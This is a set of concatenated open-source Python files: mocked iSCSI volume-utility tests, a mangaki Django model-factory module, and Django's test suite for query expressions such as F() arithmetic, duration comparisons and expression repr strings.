mock_ses_class = self._volutils._conn_wmi.MSiSCSIInitiator_SessionClass
mock_ses_class.return_value = [mock_initiator_session]
session_id = self._volutils.get_session_id_from_mounted_disk(
self._FAKE_DISK_PATH)
self.assertEqual(mock.sentinel.FAKE_SESSION_ID, session_id)
def test_get_devices_for_target(self):
init_session = self._create_initiator_session()
mock_ses_class = self._volutils._conn_wmi.MSiSCSIInitiator_SessionClass
mock_ses_class.return_value = [init_session]
devices = self._volutils._get_devices_for_target(
mock.sentinel.FAKE_IQN)
self.assertEqual(init_session.Devices, devices)
def test_get_devices_for_target_not_found(self):
mock_ses_class = self._volutils._conn_wmi.MSiSCSIInitiator_SessionClass
mock_ses_class.return_value = []
devices = self._volutils._get_devices_for_target(
mock.sentinel.FAKE_IQN)
self.assertEqual(0, len(devices))
@mock.patch.object(basevolumeutils.BaseVolumeUtils,
'_get_devices_for_target')
def test_get_device_number_for_target(self, fake_get_devices):
init_session = self._create_initiator_session()
fake_get_devices.return_value = init_session.Devices
mock_ses_class = self._volutils._conn_wmi.MSiSCSIInitiator_SessionClass
mock_ses_class.return_value = [init_session]
device_number = self._volutils.get_device_number_for_target(
mock.sentinel.FAKE_IQN, mock.sentinel.FAKE_LUN)
self.assertEqual(mock.sentinel.FAKE_DEVICE_NUMBER, device_number)
@mock.patch.object(basevolumeutils.BaseVolumeUtils,
'_get_devices_for_target')
def test_get_target_lun_count(self, fake_get_devices):
init_session = self._create_initiator_session()
# Only disk devices are being counted.
disk_device = mock.Mock(DeviceType=self._volutils._FILE_DEVICE_DISK)
init_session.Devices.append(disk_device)
fake_get_devices.return_value = init_session.Devices
lun_count = self._volutils.get_target_lun_count(
mock.sentinel.FAKE_IQN)
self.assertEqual(1, lun_count)
@mock.patch.object(basevolumeutils.BaseVolumeUtils,
"_get_drive_number_from_disk_path")
def test_get_target_from_disk_path(self, mock_get_session_id):
mock_get_session_id.return_value = mock.sentinel.FAKE_DEVICE_NUMBER
init_sess = self._create_initiator_session()
mock_ses_class = self._volutils._conn_wmi.MSiSCSIInitiator_SessionClass
mock_ses_class.return_value = [init_sess]
(target_name, scsi_lun) = self._volutils.get_target_from_disk_path(
self._FAKE_DISK_PATH)
self.assertEqual(mock.sentinel.FAKE_TARGET_NAME, target_name)
self.assertEqual(mock.sentinel.FAKE_LUN, scsi_lun)
def _create_initiator_session(self):
device = mock.MagicMock()
device.ScsiLun = mock.sentinel.FAKE_LUN
device.DeviceNumber = mock.sentinel.FAKE_DEVICE_NUMBER
device.TargetName = mock.sentinel.FAKE_TARGET_NAME
init_session = mock.MagicMock()
init_session.Devices = [device]
init_session.SessionId = mock.sentinel.FAKE_SESSION_ID
return init_session
|
apache-2.0
|
mangaki/mangaki
|
mangaki/mangaki/factories.py
|
1
|
1591
|
import factory
from factory.django import DjangoModelFactory, mute_signals
from .models import Profile, Work, Category
from django.contrib.auth.models import User
from django.db.models.signals import post_save
class ProfileFactory(DjangoModelFactory):
class Meta:
model = Profile
user = factory.SubFactory('mangaki.factories.UserFactory', profile=None)
mal_username = factory.Faker('user_name')
is_shared = factory.Faker('boolean')
nsfw_ok = factory.Faker('boolean')
newsletter_ok = factory.Faker('boolean')
avatar_url = factory.LazyAttribute(lambda o: '{}{}.png'.format(factory.Faker('url').generate({}), o.mal_username))
@mute_signals(post_save)
class UserFactory(DjangoModelFactory):
class Meta:
model = User
username = factory.Faker('user_name')
email = factory.LazyAttribute(lambda o: '{}@mangaki.fr'.format(o.username))
profile = factory.RelatedFactory(ProfileFactory, 'user')
class WorkFactory(DjangoModelFactory):
class Meta:
model = Work
category = factory.Iterator(Category.objects.all())
@factory.iterator
def title():
qs = Work.objects.values_list('title', flat=True).all()[:20]
for title in qs:
yield title
nsfw = factory.Faker('boolean')
synopsis = factory.Faker('text')
def create_user(**kwargs):
return UserFactory.create(**kwargs)
def create_user_with_profile(**kwargs):
profile = kwargs.pop('profile')
user = create_user(**kwargs)
for key, value in profile.items():
setattr(user.profile, key, value)
return user
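# Editor's note: a hedged usage sketch (not part of mangaki); the field values
# are illustrative and a Django test database is assumed. Never called here.
def _example_factory_usage():
    return create_user_with_profile(
        username='illustrative_user',
        profile={'mal_username': 'illustrative_user', 'nsfw_ok': False},
    )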
|
agpl-3.0
|
Vixionar/django
|
tests/expressions/tests.py
|
171
|
36421
|
from __future__ import unicode_literals
import datetime
import uuid
from copy import deepcopy
from django.core.exceptions import FieldError
from django.db import DatabaseError, connection, models, transaction
from django.db.models import TimeField, UUIDField
from django.db.models.aggregates import (
Avg, Count, Max, Min, StdDev, Sum, Variance,
)
from django.db.models.expressions import (
F, Case, Col, Date, DateTime, ExpressionWrapper, Func, OrderBy, Random,
RawSQL, Ref, Value, When,
)
from django.db.models.functions import (
Coalesce, Concat, Length, Lower, Substr, Upper,
)
from django.test import TestCase, skipIfDBFeature, skipUnlessDBFeature
from django.test.utils import Approximate
from django.utils import six
from django.utils.timezone import utc
from .models import UUID, Company, Employee, Experiment, Number, Time
class BasicExpressionsTests(TestCase):
@classmethod
def setUpTestData(cls):
Company.objects.create(
name="Example Inc.", num_employees=2300, num_chairs=5,
ceo=Employee.objects.create(firstname="Joe", lastname="Smith", salary=10)
)
Company.objects.create(
name="Foobar Ltd.", num_employees=3, num_chairs=4,
ceo=Employee.objects.create(firstname="Frank", lastname="Meyer", salary=20)
)
Company.objects.create(
name="Test GmbH", num_employees=32, num_chairs=1,
ceo=Employee.objects.create(firstname="Max", lastname="Mustermann", salary=30)
)
def setUp(self):
self.company_query = Company.objects.values(
"name", "num_employees", "num_chairs"
).order_by(
"name", "num_employees", "num_chairs"
)
def test_annotate_values_aggregate(self):
companies = Company.objects.annotate(
salaries=F('ceo__salary'),
).values('num_employees', 'salaries').aggregate(
result=Sum(F('salaries') + F('num_employees'),
output_field=models.IntegerField()),
)
self.assertEqual(companies['result'], 2395)
def test_filter_inter_attribute(self):
# We can filter on attribute relationships on same model obj, e.g.
# find companies where the number of employees is greater
# than the number of chairs.
self.assertQuerysetEqual(
self.company_query.filter(num_employees__gt=F("num_chairs")), [
{
"num_chairs": 5,
"name": "Example Inc.",
"num_employees": 2300,
},
{
"num_chairs": 1,
"name": "Test GmbH",
"num_employees": 32
},
],
lambda o: o
)
def test_update(self):
# We can set one field to have the value of another field
# Make sure we have enough chairs
self.company_query.update(num_chairs=F("num_employees"))
self.assertQuerysetEqual(
self.company_query, [
{
"num_chairs": 2300,
"name": "Example Inc.",
"num_employees": 2300
},
{
"num_chairs": 3,
"name": "Foobar Ltd.",
"num_employees": 3
},
{
"num_chairs": 32,
"name": "Test GmbH",
"num_employees": 32
}
],
lambda o: o
)
def test_arithmetic(self):
# We can perform arithmetic operations in expressions
# Make sure we have 2 spare chairs
self.company_query.update(num_chairs=F("num_employees") + 2)
self.assertQuerysetEqual(
self.company_query, [
{
'num_chairs': 2302,
'name': 'Example Inc.',
'num_employees': 2300
},
{
'num_chairs': 5,
'name': 'Foobar Ltd.',
'num_employees': 3
},
{
'num_chairs': 34,
'name': 'Test GmbH',
'num_employees': 32
}
],
lambda o: o,
)
def test_order_of_operations(self):
# Law of order of operations is followed
        self.company_query.update(
num_chairs=F('num_employees') + 2 * F('num_employees')
)
self.assertQuerysetEqual(
self.company_query, [
{
'num_chairs': 6900,
'name': 'Example Inc.',
'num_employees': 2300
},
{
'num_chairs': 9,
'name': 'Foobar Ltd.',
'num_employees': 3
},
{
'num_chairs': 96,
'name': 'Test GmbH',
'num_employees': 32
}
],
lambda o: o,
)
def test_parenthesis_priority(self):
# Law of order of operations can be overridden by parentheses
self.company_query.update(
num_chairs=((F('num_employees') + 2) * F('num_employees'))
)
self.assertQuerysetEqual(
self.company_query, [
{
'num_chairs': 5294600,
'name': 'Example Inc.',
'num_employees': 2300
},
{
'num_chairs': 15,
'name': 'Foobar Ltd.',
'num_employees': 3
},
{
'num_chairs': 1088,
'name': 'Test GmbH',
'num_employees': 32
}
],
lambda o: o,
)
def test_update_with_fk(self):
        # A ForeignKey can be updated with the value of another ForeignKey.
self.assertEqual(
Company.objects.update(point_of_contact=F('ceo')),
3
)
self.assertQuerysetEqual(
Company.objects.all(), [
"Joe Smith",
"Frank Meyer",
"Max Mustermann",
],
lambda c: six.text_type(c.point_of_contact),
ordered=False
)
def test_update_with_none(self):
Number.objects.create(integer=1, float=1.0)
Number.objects.create(integer=2)
Number.objects.filter(float__isnull=False).update(float=Value(None))
self.assertQuerysetEqual(
Number.objects.all(), [
None,
None,
],
lambda n: n.float,
ordered=False
)
def test_filter_with_join(self):
# F Expressions can also span joins
Company.objects.update(point_of_contact=F('ceo'))
c = Company.objects.all()[0]
c.point_of_contact = Employee.objects.create(firstname="Guido", lastname="van Rossum")
c.save()
self.assertQuerysetEqual(
Company.objects.filter(ceo__firstname=F("point_of_contact__firstname")), [
"Foobar Ltd.",
"Test GmbH",
],
lambda c: c.name,
ordered=False
)
Company.objects.exclude(
ceo__firstname=F("point_of_contact__firstname")
).update(name="foo")
self.assertEqual(
Company.objects.exclude(
ceo__firstname=F('point_of_contact__firstname')
).get().name,
"foo",
)
with transaction.atomic():
with self.assertRaises(FieldError):
Company.objects.exclude(
ceo__firstname=F('point_of_contact__firstname')
).update(name=F('point_of_contact__lastname'))
def test_object_update(self):
# F expressions can be used to update attributes on single objects
test_gmbh = Company.objects.get(name="Test GmbH")
self.assertEqual(test_gmbh.num_employees, 32)
test_gmbh.num_employees = F("num_employees") + 4
test_gmbh.save()
test_gmbh = Company.objects.get(pk=test_gmbh.pk)
self.assertEqual(test_gmbh.num_employees, 36)
def test_object_update_fk(self):
# F expressions cannot be used to update attributes which are foreign
# keys, or attributes which involve joins.
test_gmbh = Company.objects.get(name="Test GmbH")
def test():
test_gmbh.point_of_contact = F("ceo")
self.assertRaises(ValueError, test)
test_gmbh.point_of_contact = test_gmbh.ceo
test_gmbh.save()
test_gmbh.name = F("ceo__last_name")
self.assertRaises(FieldError, test_gmbh.save)
def test_object_update_unsaved_objects(self):
# F expressions cannot be used to update attributes on objects which do
# not yet exist in the database
test_gmbh = Company.objects.get(name="Test GmbH")
acme = Company(
name="The Acme Widget Co.", num_employees=12, num_chairs=5,
ceo=test_gmbh.ceo
)
acme.num_employees = F("num_employees") + 16
self.assertRaises(TypeError, acme.save)
def test_ticket_11722_iexact_lookup(self):
Employee.objects.create(firstname="John", lastname="Doe")
Employee.objects.create(firstname="Test", lastname="test")
queryset = Employee.objects.filter(firstname__iexact=F('lastname'))
self.assertQuerysetEqual(queryset, ["<Employee: Test test>"])
@skipIfDBFeature('has_case_insensitive_like')
def test_ticket_16731_startswith_lookup(self):
Employee.objects.create(firstname="John", lastname="Doe")
e2 = Employee.objects.create(firstname="Jack", lastname="Jackson")
e3 = Employee.objects.create(firstname="Jack", lastname="jackson")
self.assertQuerysetEqual(
Employee.objects.filter(lastname__startswith=F('firstname')),
[e2], lambda x: x)
self.assertQuerysetEqual(
Employee.objects.filter(lastname__istartswith=F('firstname')).order_by('pk'),
[e2, e3], lambda x: x)
def test_ticket_18375_join_reuse(self):
# Test that reverse multijoin F() references and the lookup target
# the same join. Pre #18375 the F() join was generated first, and the
# lookup couldn't reuse that join.
qs = Employee.objects.filter(
company_ceo_set__num_chairs=F('company_ceo_set__num_employees'))
self.assertEqual(str(qs.query).count('JOIN'), 1)
def test_ticket_18375_kwarg_ordering(self):
# The next query was dict-randomization dependent - if the "gte=1"
# was seen first, then the F() will reuse the join generated by the
# gte lookup, if F() was seen first, then it generated a join the
# other lookups could not reuse.
qs = Employee.objects.filter(
company_ceo_set__num_chairs=F('company_ceo_set__num_employees'),
company_ceo_set__num_chairs__gte=1)
self.assertEqual(str(qs.query).count('JOIN'), 1)
def test_ticket_18375_kwarg_ordering_2(self):
# Another similar case for F() than above. Now we have the same join
# in two filter kwargs, one in the lhs lookup, one in F. Here pre
# #18375 the amount of joins generated was random if dict
# randomization was enabled, that is the generated query dependent
# on which clause was seen first.
qs = Employee.objects.filter(
company_ceo_set__num_employees=F('pk'),
pk=F('company_ceo_set__num_employees')
)
self.assertEqual(str(qs.query).count('JOIN'), 1)
def test_ticket_18375_chained_filters(self):
# Test that F() expressions do not reuse joins from previous filter.
qs = Employee.objects.filter(
company_ceo_set__num_employees=F('pk')
).filter(
company_ceo_set__num_employees=F('company_ceo_set__num_employees')
)
self.assertEqual(str(qs.query).count('JOIN'), 2)
class ExpressionsTests(TestCase):
def test_F_object_deepcopy(self):
"""
Make sure F objects can be deepcopied (#23492)
"""
f = F("foo")
g = deepcopy(f)
self.assertEqual(f.name, g.name)
def test_f_reuse(self):
f = F('id')
n = Number.objects.create(integer=-1)
c = Company.objects.create(
name="Example Inc.", num_employees=2300, num_chairs=5,
ceo=Employee.objects.create(firstname="Joe", lastname="Smith")
)
c_qs = Company.objects.filter(id=f)
self.assertEqual(c_qs.get(), c)
# Reuse the same F-object for another queryset
n_qs = Number.objects.filter(id=f)
self.assertEqual(n_qs.get(), n)
# The original query still works correctly
self.assertEqual(c_qs.get(), c)
def test_patterns_escape(self):
"""
Test that special characters (e.g. %, _ and \) stored in the database are
properly escaped when using a pattern lookup with an expression --
refs #16731
"""
Employee.objects.bulk_create([
Employee(firstname="%Joh\\nny", lastname="%Joh\\n"),
Employee(firstname="Johnny", lastname="%John"),
Employee(firstname="Jean-Claude", lastname="Claud_"),
Employee(firstname="Jean-Claude", lastname="Claude"),
Employee(firstname="Jean-Claude", lastname="Claude%"),
Employee(firstname="Johnny", lastname="Joh\\n"),
Employee(firstname="Johnny", lastname="John"),
Employee(firstname="Johnny", lastname="_ohn"),
])
self.assertQuerysetEqual(
Employee.objects.filter(firstname__contains=F('lastname')),
["<Employee: %Joh\\nny %Joh\\n>", "<Employee: Jean-Claude Claude>", "<Employee: Johnny John>"],
ordered=False)
self.assertQuerysetEqual(
Employee.objects.filter(firstname__startswith=F('lastname')),
["<Employee: %Joh\\nny %Joh\\n>", "<Employee: Johnny John>"],
ordered=False)
self.assertQuerysetEqual(
Employee.objects.filter(firstname__endswith=F('lastname')),
["<Employee: Jean-Claude Claude>"],
ordered=False)
def test_insensitive_patterns_escape(self):
"""
Test that special characters (e.g. %, _ and \) stored in the database are
properly escaped when using a case insensitive pattern lookup with an
expression -- refs #16731
"""
Employee.objects.bulk_create([
Employee(firstname="%Joh\\nny", lastname="%joh\\n"),
Employee(firstname="Johnny", lastname="%john"),
Employee(firstname="Jean-Claude", lastname="claud_"),
Employee(firstname="Jean-Claude", lastname="claude"),
Employee(firstname="Jean-Claude", lastname="claude%"),
Employee(firstname="Johnny", lastname="joh\\n"),
Employee(firstname="Johnny", lastname="john"),
Employee(firstname="Johnny", lastname="_ohn"),
])
self.assertQuerysetEqual(
Employee.objects.filter(firstname__icontains=F('lastname')),
["<Employee: %Joh\\nny %joh\\n>", "<Employee: Jean-Claude claude>", "<Employee: Johnny john>"],
ordered=False)
self.assertQuerysetEqual(
Employee.objects.filter(firstname__istartswith=F('lastname')),
["<Employee: %Joh\\nny %joh\\n>", "<Employee: Johnny john>"],
ordered=False)
self.assertQuerysetEqual(
Employee.objects.filter(firstname__iendswith=F('lastname')),
["<Employee: Jean-Claude claude>"],
ordered=False)
class ExpressionsNumericTests(TestCase):
def setUp(self):
Number(integer=-1).save()
Number(integer=42).save()
Number(integer=1337).save()
self.assertEqual(Number.objects.update(float=F('integer')), 3)
def test_fill_with_value_from_same_object(self):
"""
We can fill a value in all objects with another value of the
same object.
"""
self.assertQuerysetEqual(
Number.objects.all(),
[
'<Number: -1, -1.000>',
'<Number: 42, 42.000>',
'<Number: 1337, 1337.000>'
],
ordered=False
)
def test_increment_value(self):
"""
We can increment a value of all objects in a query set.
"""
self.assertEqual(
Number.objects.filter(integer__gt=0)
.update(integer=F('integer') + 1),
2)
self.assertQuerysetEqual(
Number.objects.all(),
[
'<Number: -1, -1.000>',
'<Number: 43, 42.000>',
'<Number: 1338, 1337.000>'
],
ordered=False
)
def test_filter_not_equals_other_field(self):
"""
We can filter for objects where a value does not equal the value
of another field.
"""
self.assertEqual(
Number.objects.filter(integer__gt=0)
.update(integer=F('integer') + 1),
2)
self.assertQuerysetEqual(
Number.objects.exclude(float=F('integer')),
[
'<Number: 43, 42.000>',
'<Number: 1338, 1337.000>'
],
ordered=False
)
def test_complex_expressions(self):
"""
Complex expressions of different connection types are possible.
"""
n = Number.objects.create(integer=10, float=123.45)
self.assertEqual(Number.objects.filter(pk=n.pk).update(
float=F('integer') + F('float') * 2), 1)
self.assertEqual(Number.objects.get(pk=n.pk).integer, 10)
self.assertEqual(Number.objects.get(pk=n.pk).float, Approximate(256.900, places=3))
def test_incorrect_field_expression(self):
with six.assertRaisesRegex(self, FieldError, "Cannot resolve keyword u?'nope' into field.*"):
list(Employee.objects.filter(firstname=F('nope')))
class ExpressionOperatorTests(TestCase):
def setUp(self):
self.n = Number.objects.create(integer=42, float=15.5)
def test_lefthand_addition(self):
# LH Addition of floats and integers
Number.objects.filter(pk=self.n.pk).update(
integer=F('integer') + 15,
float=F('float') + 42.7
)
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 57)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(58.200, places=3))
def test_lefthand_subtraction(self):
# LH Subtraction of floats and integers
Number.objects.filter(pk=self.n.pk).update(integer=F('integer') - 15,
float=F('float') - 42.7)
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 27)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(-27.200, places=3))
def test_lefthand_multiplication(self):
# LH Multiplication of floats and integers
Number.objects.filter(pk=self.n.pk).update(integer=F('integer') * 15,
float=F('float') * 42.7)
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 630)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(661.850, places=3))
def test_lefthand_division(self):
# LH Division of floats and integers
Number.objects.filter(pk=self.n.pk).update(integer=F('integer') / 2,
float=F('float') / 42.7)
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 21)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(0.363, places=3))
def test_lefthand_modulo(self):
# LH Modulo arithmetic on integers
Number.objects.filter(pk=self.n.pk).update(integer=F('integer') % 20)
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 2)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(15.500, places=3))
def test_lefthand_bitwise_and(self):
# LH Bitwise ands on integers
Number.objects.filter(pk=self.n.pk).update(integer=F('integer').bitand(56))
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 40)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(15.500, places=3))
@skipUnlessDBFeature('supports_bitwise_or')
def test_lefthand_bitwise_or(self):
# LH Bitwise or on integers
Number.objects.filter(pk=self.n.pk).update(integer=F('integer').bitor(48))
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 58)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(15.500, places=3))
def test_lefthand_power(self):
# LH Power arithmetic operation on floats and integers
Number.objects.filter(pk=self.n.pk).update(integer=F('integer') ** 2,
float=F('float') ** 1.5)
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 1764)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(61.02, places=2))
def test_right_hand_addition(self):
# Right hand operators
Number.objects.filter(pk=self.n.pk).update(integer=15 + F('integer'),
float=42.7 + F('float'))
# RH Addition of floats and integers
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 57)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(58.200, places=3))
def test_right_hand_subtraction(self):
Number.objects.filter(pk=self.n.pk).update(integer=15 - F('integer'),
float=42.7 - F('float'))
# RH Subtraction of floats and integers
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, -27)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(27.200, places=3))
def test_right_hand_multiplication(self):
# RH Multiplication of floats and integers
Number.objects.filter(pk=self.n.pk).update(integer=15 * F('integer'),
float=42.7 * F('float'))
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 630)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(661.850, places=3))
def test_right_hand_division(self):
# RH Division of floats and integers
Number.objects.filter(pk=self.n.pk).update(integer=640 / F('integer'),
float=42.7 / F('float'))
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 15)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(2.755, places=3))
def test_right_hand_modulo(self):
# RH Modulo arithmetic on integers
Number.objects.filter(pk=self.n.pk).update(integer=69 % F('integer'))
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 27)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(15.500, places=3))
def test_righthand_power(self):
# RH Power arithmetic operation on floats and integers
Number.objects.filter(pk=self.n.pk).update(integer=2 ** F('integer'),
float=1.5 ** F('float'))
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 4398046511104)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(536.308, places=3))
class FTimeDeltaTests(TestCase):
def setUp(self):
self.sday = sday = datetime.date(2010, 6, 25)
self.stime = stime = datetime.datetime(2010, 6, 25, 12, 15, 30, 747000)
midnight = datetime.time(0)
delta0 = datetime.timedelta(0)
delta1 = datetime.timedelta(microseconds=253000)
delta2 = datetime.timedelta(seconds=44)
delta3 = datetime.timedelta(hours=21, minutes=8)
delta4 = datetime.timedelta(days=10)
# Test data is set so that deltas and delays will be
# strictly increasing.
self.deltas = []
self.delays = []
self.days_long = []
# e0: started same day as assigned, zero duration
end = stime + delta0
e0 = Experiment.objects.create(name='e0', assigned=sday, start=stime,
end=end, completed=end.date(), estimated_time=delta0)
self.deltas.append(delta0)
self.delays.append(e0.start -
datetime.datetime.combine(e0.assigned, midnight))
self.days_long.append(e0.completed - e0.assigned)
# e1: started one day after assigned, tiny duration, data
# set so that end time has no fractional seconds, which
# tests an edge case on sqlite. This Experiment is only
# included in the test data when the DB supports microsecond
# precision.
if connection.features.supports_microsecond_precision:
delay = datetime.timedelta(1)
end = stime + delay + delta1
e1 = Experiment.objects.create(name='e1', assigned=sday,
start=stime + delay, end=end, completed=end.date(), estimated_time=delta1)
self.deltas.append(delta1)
self.delays.append(e1.start -
datetime.datetime.combine(e1.assigned, midnight))
self.days_long.append(e1.completed - e1.assigned)
# e2: started three days after assigned, small duration
end = stime + delta2
e2 = Experiment.objects.create(name='e2',
assigned=sday - datetime.timedelta(3), start=stime, end=end,
completed=end.date(), estimated_time=datetime.timedelta(hours=1))
self.deltas.append(delta2)
self.delays.append(e2.start -
datetime.datetime.combine(e2.assigned, midnight))
self.days_long.append(e2.completed - e2.assigned)
# e3: started four days after assigned, medium duration
delay = datetime.timedelta(4)
end = stime + delay + delta3
e3 = Experiment.objects.create(name='e3',
assigned=sday, start=stime + delay, end=end, completed=end.date(), estimated_time=delta3)
self.deltas.append(delta3)
self.delays.append(e3.start -
datetime.datetime.combine(e3.assigned, midnight))
self.days_long.append(e3.completed - e3.assigned)
# e4: started 10 days after assignment, long duration
end = stime + delta4
e4 = Experiment.objects.create(name='e4',
assigned=sday - datetime.timedelta(10), start=stime, end=end,
completed=end.date(), estimated_time=delta4 - datetime.timedelta(1))
self.deltas.append(delta4)
self.delays.append(e4.start -
datetime.datetime.combine(e4.assigned, midnight))
self.days_long.append(e4.completed - e4.assigned)
self.expnames = [e.name for e in Experiment.objects.all()]
def test_multiple_query_compilation(self):
# Ticket #21643
queryset = Experiment.objects.filter(end__lt=F('start') + datetime.timedelta(hours=1))
q1 = str(queryset.query)
q2 = str(queryset.query)
self.assertEqual(q1, q2)
def test_query_clone(self):
# Ticket #21643 - Crash when compiling query more than once
qs = Experiment.objects.filter(end__lt=F('start') + datetime.timedelta(hours=1))
qs2 = qs.all()
list(qs)
list(qs2)
# Intentionally no assert
def test_delta_add(self):
for i in range(len(self.deltas)):
delta = self.deltas[i]
test_set = [e.name for e in
Experiment.objects.filter(end__lt=F('start') + delta)]
self.assertEqual(test_set, self.expnames[:i])
test_set = [e.name for e in
Experiment.objects.filter(end__lt=delta + F('start'))]
self.assertEqual(test_set, self.expnames[:i])
test_set = [e.name for e in
Experiment.objects.filter(end__lte=F('start') + delta)]
self.assertEqual(test_set, self.expnames[:i + 1])
def test_delta_subtract(self):
for i in range(len(self.deltas)):
delta = self.deltas[i]
test_set = [e.name for e in
Experiment.objects.filter(start__gt=F('end') - delta)]
self.assertEqual(test_set, self.expnames[:i])
test_set = [e.name for e in
Experiment.objects.filter(start__gte=F('end') - delta)]
self.assertEqual(test_set, self.expnames[:i + 1])
def test_exclude(self):
for i in range(len(self.deltas)):
delta = self.deltas[i]
test_set = [e.name for e in
Experiment.objects.exclude(end__lt=F('start') + delta)]
self.assertEqual(test_set, self.expnames[i:])
test_set = [e.name for e in
Experiment.objects.exclude(end__lte=F('start') + delta)]
self.assertEqual(test_set, self.expnames[i + 1:])
def test_date_comparison(self):
for i in range(len(self.days_long)):
days = self.days_long[i]
test_set = [e.name for e in
Experiment.objects.filter(completed__lt=F('assigned') + days)]
self.assertEqual(test_set, self.expnames[:i])
test_set = [e.name for e in
Experiment.objects.filter(completed__lte=F('assigned') + days)]
self.assertEqual(test_set, self.expnames[:i + 1])
@skipUnlessDBFeature("supports_mixed_date_datetime_comparisons")
def test_mixed_comparisons1(self):
for i in range(len(self.delays)):
delay = self.delays[i]
if not connection.features.supports_microsecond_precision:
delay = datetime.timedelta(delay.days, delay.seconds)
test_set = [e.name for e in
Experiment.objects.filter(assigned__gt=F('start') - delay)]
self.assertEqual(test_set, self.expnames[:i])
test_set = [e.name for e in
Experiment.objects.filter(assigned__gte=F('start') - delay)]
self.assertEqual(test_set, self.expnames[:i + 1])
def test_mixed_comparisons2(self):
delays = [datetime.timedelta(delay.days) for delay in self.delays]
for i in range(len(delays)):
delay = delays[i]
test_set = [e.name for e in
Experiment.objects.filter(start__lt=F('assigned') + delay)]
self.assertEqual(test_set, self.expnames[:i])
test_set = [e.name for e in
Experiment.objects.filter(start__lte=F('assigned') + delay +
datetime.timedelta(1))]
self.assertEqual(test_set, self.expnames[:i + 1])
def test_delta_update(self):
for i in range(len(self.deltas)):
delta = self.deltas[i]
exps = Experiment.objects.all()
expected_durations = [e.duration() for e in exps]
expected_starts = [e.start + delta for e in exps]
expected_ends = [e.end + delta for e in exps]
Experiment.objects.update(start=F('start') + delta, end=F('end') + delta)
exps = Experiment.objects.all()
new_starts = [e.start for e in exps]
new_ends = [e.end for e in exps]
new_durations = [e.duration() for e in exps]
self.assertEqual(expected_starts, new_starts)
self.assertEqual(expected_ends, new_ends)
self.assertEqual(expected_durations, new_durations)
def test_invalid_operator(self):
with self.assertRaises(DatabaseError):
list(Experiment.objects.filter(start=F('start') * datetime.timedelta(0)))
def test_durationfield_add(self):
zeros = [e.name for e in
Experiment.objects.filter(start=F('start') + F('estimated_time'))]
self.assertEqual(zeros, ['e0'])
end_less = [e.name for e in
Experiment.objects.filter(end__lt=F('start') + F('estimated_time'))]
self.assertEqual(end_less, ['e2'])
delta_math = [e.name for e in
Experiment.objects.filter(end__gte=F('start') + F('estimated_time') + datetime.timedelta(hours=1))]
self.assertEqual(delta_math, ['e4'])
@skipUnlessDBFeature("has_native_duration_field")
def test_date_subtraction(self):
under_estimate = [e.name for e in
Experiment.objects.filter(estimated_time__gt=F('end') - F('start'))]
self.assertEqual(under_estimate, ['e2'])
over_estimate = [e.name for e in
Experiment.objects.filter(estimated_time__lt=F('end') - F('start'))]
self.assertEqual(over_estimate, ['e4'])
def test_duration_with_datetime(self):
# Exclude e1, which has very high precision, so we can test this on all
# backends regardless of whether or not they support
# microsecond precision.
over_estimate = Experiment.objects.exclude(name='e1').filter(
completed__gt=self.stime + F('estimated_time'),
).order_by('name')
self.assertQuerysetEqual(over_estimate, ['e3', 'e4'], lambda e: e.name)
class ValueTests(TestCase):
def test_update_TimeField_using_Value(self):
Time.objects.create()
Time.objects.update(time=Value(datetime.time(1), output_field=TimeField()))
self.assertEqual(Time.objects.get().time, datetime.time(1))
def test_update_UUIDField_using_Value(self):
UUID.objects.create()
UUID.objects.update(uuid=Value(uuid.UUID('12345678901234567890123456789012'), output_field=UUIDField()))
self.assertEqual(UUID.objects.get().uuid, uuid.UUID('12345678901234567890123456789012'))
class ReprTests(TestCase):
def test_expressions(self):
self.assertEqual(
repr(Case(When(a=1))),
"<Case: CASE WHEN <Q: (AND: ('a', 1))> THEN Value(None), ELSE Value(None)>"
)
self.assertEqual(repr(Col('alias', 'field')), "Col(alias, field)")
self.assertEqual(repr(Date('published', 'exact')), "Date(published, exact)")
self.assertEqual(repr(DateTime('published', 'exact', utc)), "DateTime(published, exact, %s)" % utc)
self.assertEqual(repr(F('published')), "F(published)")
self.assertEqual(repr(F('cost') + F('tax')), "<CombinedExpression: F(cost) + F(tax)>")
self.assertEqual(
repr(ExpressionWrapper(F('cost') + F('tax'), models.IntegerField())),
"ExpressionWrapper(F(cost) + F(tax))"
)
self.assertEqual(repr(Func('published', function='TO_CHAR')), "Func(F(published), function=TO_CHAR)")
self.assertEqual(repr(OrderBy(Value(1))), 'OrderBy(Value(1), descending=False)')
self.assertEqual(repr(Random()), "Random()")
self.assertEqual(repr(RawSQL('table.col', [])), "RawSQL(table.col, [])")
self.assertEqual(repr(Ref('sum_cost', Sum('cost'))), "Ref(sum_cost, Sum(F(cost)))")
self.assertEqual(repr(Value(1)), "Value(1)")
def test_functions(self):
self.assertEqual(repr(Coalesce('a', 'b')), "Coalesce(F(a), F(b))")
self.assertEqual(repr(Concat('a', 'b')), "Concat(ConcatPair(F(a), F(b)))")
